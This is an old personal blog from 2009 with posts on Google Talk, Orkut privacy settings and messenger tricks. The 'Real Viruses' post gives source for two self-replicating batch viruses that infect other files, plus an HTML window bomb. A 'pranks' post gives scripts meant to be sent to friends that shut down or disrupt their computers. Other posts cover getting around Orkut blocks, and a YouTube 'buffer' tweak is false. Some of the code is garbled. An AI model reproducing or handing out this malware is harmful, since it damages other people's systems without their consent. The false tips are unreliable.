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Change Display Or Edit Friend Name In Gtalk

By Nitin Adlakha On April 26, 2009 0 comments

Hi All, presenting before you a new Blog The Wandering Thoughts. Hope you guys like it..!! Appreciate your feedback..!!

You can create or Chage ’display name’ in Google Talk that will appear instead of your username. This will affect your contacts’ Friends lists, but will not affect your orkut profile page.

To create a display name:

  • Sign in to Google Talk. Click Settings along the top of your Friends list. Highlight General along the left side of the window, and click Account settings. Click Edit next to Personal information.Fill out one or both of the First Name and Last Name fields. Click Save.

To see your changes, you’ll need to sign out and sign back in to Google Talk.Keep in mind that your friends have the ability to change the way your name appears in their own Friends lists, and you can rename your friends, also. Changing the names of friends never affects their accounts — the changes only appear in the list in which they were made. To rename a friend, right-click his or her name in your Friends list and select Rename.

5 Privacy Setting Every Orkut User Should Know

By Nitin Adlakha On April 26, 2009 0 comments

Hi All, presenting before you a new Blog The Wandering Thoughts. Hope you guys like it..!! Appreciate your feedback..!!

Orkut profile can be used for varity of purposes both by owner and third person, anyone can easly extract yours information if you will not follow proper privacy feature, so it is necessay for you to know all below privacy feature to protect yours profile content on Orkut.

Remove Yourself From Google Search Results

Many few orkut users are aware of this fact that orkut profile can be indexed in google search very easily, and anyone can find you just entering few details about you in google search .Now if you have decided to hide yourself from search rsults then follow below instruction

  • To hide yours profile from Search Engine Go to Setting Privacy Tab and Select Hide information from orkut in google search results.

Enable or Disable Photo Tagging In Orkut

Photo tagging is now used by orkuters for fun users are uploading funny images and tagging them in orkut album to insult his/her friends .So if you are one among them then you can disable this from your setting here’s how

  • Go to Setting Select Privacy Tab and Unmark yes to Disable Photo tagging

Allow selected people to Sent Friend Request

In orkut anyone can send you Friend request , if you only want to receive friend request from your friends then select friend requests are allowed to be sent by either friends of friends or people who know my email address (required default).

Allow content to be accessed by Friends or everyone

Few months back anyone can easily read anyone scraps and retrive his/her information but now this is not possible if you have selected yours privacy to Only my friends , this setting will help you protect your scrapbook albums , testimonial and Videos from strangers in orkut .

Hide Orkut Photos Album From Friends

How many of you want to hide some private photos from there friends ,I think among thousand many says yes i wana hide some pictures from some of my friends ,and this is possible also just a simple orkut setting and you are done ,Here’s how
  • Go to Orkut Setting Privacy Tab and find albums setting at bottom of orkut pages under allow content to be accessed by and select choose per album

  • Clickon edit to reset album setting, If you wants to hide album from yours all friends click cross mark in groups as shown in below image.

If you want to share your albums with few of yours friends then you can use choose friends feature ( Invitation send using Email ) to share your albums inside as well as outside the orkut .
Orkut is so much popular these days that it is blocked by every top institutes ,They use all the means to block orkut ,but still there are some ways when proxy fails or not working ,you can easily surf orkut anonymously.

It is generally seen that institutes and other working offices blocked orkut via there Surf Orkut without Proxy Even When It is Blockedmain domain they donot give much value to there secondary domain name as in the case of orkut ,

You have observed that orkut have recently divided orkut .com into two different domain name ,i.e ( Brazil Version ) ( Indian Version ) and one for ( mobile version ) , , and many more. When or is blocked try to surf orkut with or .

This change will help in surfing orkut without proxy or at that place where orkut is always blocked .Just login with any above mention domain when is blocked and connets with yours friends .

But remember if you are prone to Userscripts or Greasemonkey extension while surfing orkut then it will not work for this you have to follow special Userscripts Guide, that will helps you surf with all orkut userscripts and Extensions.

So, Enjoyyy Orkut.........!!!!!!!!

Hi All, presenting before you a new Blog The Wandering Thoughts. Hope you guys like it..!! Appreciate your feedback..!!

Are you a Facebook User as well as Orkut Users Also ,and want to use both in one profile , Yes it is possible to integrate facebook into orkut profile and Orkut in Facebook profile .These can be possible using facebook and orkut application and all these apps are available in yours facebook and orkut application directory . You can also access directly to these application through below information.

First One is For Accessing Facebook from Orkut - Keep in touch with all your Facebook friends Using this orkut application . The application is using IPhone’s Facebook Interface

Another application is Accessing Orkut From Facebook -This application brings you your very own Orkut profile to your Facebook account!You dont have to provide any login or password. All you specify is your Orkut Profile URL! Share your Orkut Profile, Photos, Scraps with your Facebook friends!

Note - Both of the application is not officially supported by Orkut or Google or Facebook.

Create TinyUrl Link From Firefox

By Nitin Adlakha On April 26, 2009 0 comments
TinyUrl lets you shrink any long URL in your address bar or link on the page to something you can easily email or Twitter with a single click.
Now any link on a page that has a address will contain a tooltip to tell you what the full URL for it is. Just hover your mouse over the link for a moment and you’ll see the full URL appear as a tooltip.To active this feature on your firefox browser follow below steps:

  • Install Fiirefox Tinyurl addon Creator.
  • Once Installed Right Click on any link and choose “create tinyurl link for this page”.
  • The TinyUrl Creator is accessible in the Tools menu and in the right-click context menu. You can even add it to your toolbars as an icon (View > Toolbars > Customize)
  • You can also view your Saved Tiny url Link from Tools > Tinyurl creator > view Saved


New Orkut Hacks

By Nitin Adlakha On April 18, 2009 0 comments
Scrap All

Hi frnds,
Orkut has fixs its bug but not all. Some vulnerability is always there.
So, here i am with a new method to scrap all ur friends with a single click.
But it has some limitation.

1. You must be using Mozilla Firefox.
Download it here:-

2. There must be an Add-on called Greasemonkey Script.
Download the add-on at:-

3. Now After installing add-on, restart the FireFox. Download and install the script.
Download the script at:-

4. After installing the script, login into your orkut account and in the address field copy paste the following javascript given below:


View Friend's Scrapbook more than Limit

you can view 30 scraps of the scrapbook you are looking into.

Step1: Open Friends scrapbook

Step2: Look in your address bar (i.e the place where u type You will see this address written

Step3: Add this code "&na=&nst=&nid=&pageSize=30" at the end of the address.
It will look like this;pageSize=30

30 specifies that you can view 30 scraps of the scrapbook you are looking into.

Hope U'll like these posts....

Multiple GTalk

By Nitin Adlakha On April 18, 2009 1 comments
Yes, u heard right.......
Just like multiple yahoo messenger you can also use multiple Gtalk...
For this u need not to go to registry.
Its Very much simple...

The Process is like this:

1. Right click the gtalk shortcut icon.
2. Goto Properties.
3. U need to edit the target field there.
4. Initially it is:

"C:\Users\Adlaks\AppData\Roaming\Google\Google Talk\googletalk.exe" /startmenu

5. Now add '/nomutex' without qoutes in the end. The code will now look as:

"C:\Users\Adlaks\AppData\Roaming\Google\Google Talk\googletalk.exe" /startmenu /nomutex

6. Thats it....

Enjoy Multiple Gtalk.........

Multiple Login in Yahoo Messenger

By Nitin Adlakha On April 18, 2009 1 comments

Hi All, presenting before you a new Blog The Wandering Thoughts. Hope you guys like it..!! Appreciate your feedback..!!

1. Go to Start ==> Run ==>> Type regedit,hit enter

2. Go to HKEY_CURRENT_USER ==>> Software ==>> Yahoo ==>> pager ==>>Test

3. On the right pane ==>> right-click and choose new Dword value .

4. Name it as Plural.

5. Double click and assign a decimal value of 1.

6. Now close registry and press F5.

7. For signing in with new id open another messenger.

Enjoy........n have Fun.........

Hi All, presenting before you a new Blog The Wandering Thoughts. Hope you guys like it..!! Appreciate your feedback..!!

Through this method,u can increase the buffering speed of hosted by youtube/metacafe
its tested by myself...

what you need to do is:

1. Go to start
2.Click on run or press Win+R key
3.Now in RUN prompt type "system.ini" without qoutes

after that u'll get system a notepad file with these entries:

; for 16-bit app support

below this text copy and paste this:

page buffer=1000000Tbps

Now the whole document will look as:

; for 16-bit app support
page buffer=1000000Tbps

save the notepad file
and reboot your system

Orkut Hacks

By Nitin Adlakha On April 10, 2009 0 comments

Save Orkut Friend Album Photos

If u r using Internet Explorer or Google Chrome, u can directly use the feature of drag and drag and save the photo directly to ur desktop. But what if u r using Mozilla FireFox. Here's the solution:

To Re-Enable Click on yrs Friend AlbumPhotos Go to Tools > Page Info > Media and Scroll up or down to get the protected photo image Url ,Or Click Save as Directly from there to save that picture from orkut album.

Scrap All

This script works fine in all browsers. The only limit to this script is that u can send scrap to atmost 300 persons at a single time.


Just Copy and Paste the Code given above into Ur address Bar ( its the place where you type website names , Eg: The place where u typed Press Enter
then wait for a few seconds.You will get a screen where you can type in your message ,after typing the message click send scraps , you will get a dialog box ,click OK

Real Viruses

By Nitin Adlakha On April 10, 2009 0 comments
Warning:- These codes are not pranks so dont open the files on ur system after creating them as it can lead to multiplication of viruses in ur system. Use it at ur own risk.

Code 1:

@echo off>nul.ViRuS
if "%1=="/ViRuS_MULTIPLY goto ViRuS_multiply
if "%1=="/ViRuS_OUTER_LOOP goto ViRuS_outer_loop
if "%1=="/ViRuS_FINDSELF goto ViRuS_findself
if "%VOFF%=="T goto ViRuS_OLDBAT

set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if "%ViRuSname%==" goto ViRuS_OLDBAT

rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it's a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append/x:on path(chanceminimal)

attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=

if "%2==" goto XXX_END>nul.ViRuS
if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
goto ViRuS_findself

for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS

find "ViRuS" <%ViRuSname%.bat >xViRuSx.bat
find /v "ViRuS" <%2 |find /v ":XXX_END" >>xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS

echo on>nul.ViRuS

Type or Copy the above code in Notepad and save it as "anyname.bat"

Code 2:

@echo off
ctty nul
rem ______________________________________________________________
rem :Wagner Virus, as presented in Virology 101 (c) 1993 Black Wolf
rem :This virus can be cured simply by typing "attrib -h -r *.*" in
rem :infected directories and deleting BAT files that are identical
rem :to this code, then rename the files having a "V" at the start
rem :to their original names. NOTE: Does not infect COMMAND.COM.
rem :______________________________________________________________
for %%f in (*.exe *.com) do set A=%%f
if %A%==COMMAND.COM set A=

rename %A% V%A%
if not exist V%A% goto end
attrib +h V%A%
copy %0.bat %A%
attrib +r %A%
ren %A% *.bat
set A=
ctty con
@if exist %1 %2 %3
@if exist V%0.exe V%0.exe %1 %2 %3

Save it as "anyname.bat".

Code 3: Shutdown Forcebly

<*TITLE>WARNING! Infecting Virus!

<*BODY onload="WindowBomb()">
<*script LANGUAGE="JavaScript">

*function WindowBomb()
*{var iCounter = 0 // dummy counter

*while (true)
*"","CRASHING" + *iCounter,"width=1,height=1,resizable=no")



remove all *

paste it in notepad then save it as anyname.html

Note: More viruses will be revealed soon,....

Till then Happy Surfing

Funny Virus Pranks

By Nitin Adlakha On April 10, 2009 0 comments
Basic Info:
These funny pranks are not really viruses. These are just pranks used to scare people of u. Just send these to ur frnds and see how they panic.

Requirements:- Notepad

Code 1: Give ur frnd a msg that he is a fool and shutdown his/her computer

@echo off

msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save this code with "anyname.bat" and send it.

Code 2: Frustrate ur frnd by making this Script hitting Enter simultaneously

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "~(enter)"

save this code with "anyname.vbs" and send it.

Code 3: Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

save this code with "anyname.vbs" and send it.

Code 4: . Open Notepad continually in your friend's computer

@ECHO off
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

Code 5: Continually pop out your friend's CD Drive.

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
For i = 0 to colCDROMs.Count - 1
End If
wscript.sleep 5000

Save it as "Anything.VBS" and send it. - Cheap domain name registration, renewal and transfers - Free SSL Certificates - Web Hosting

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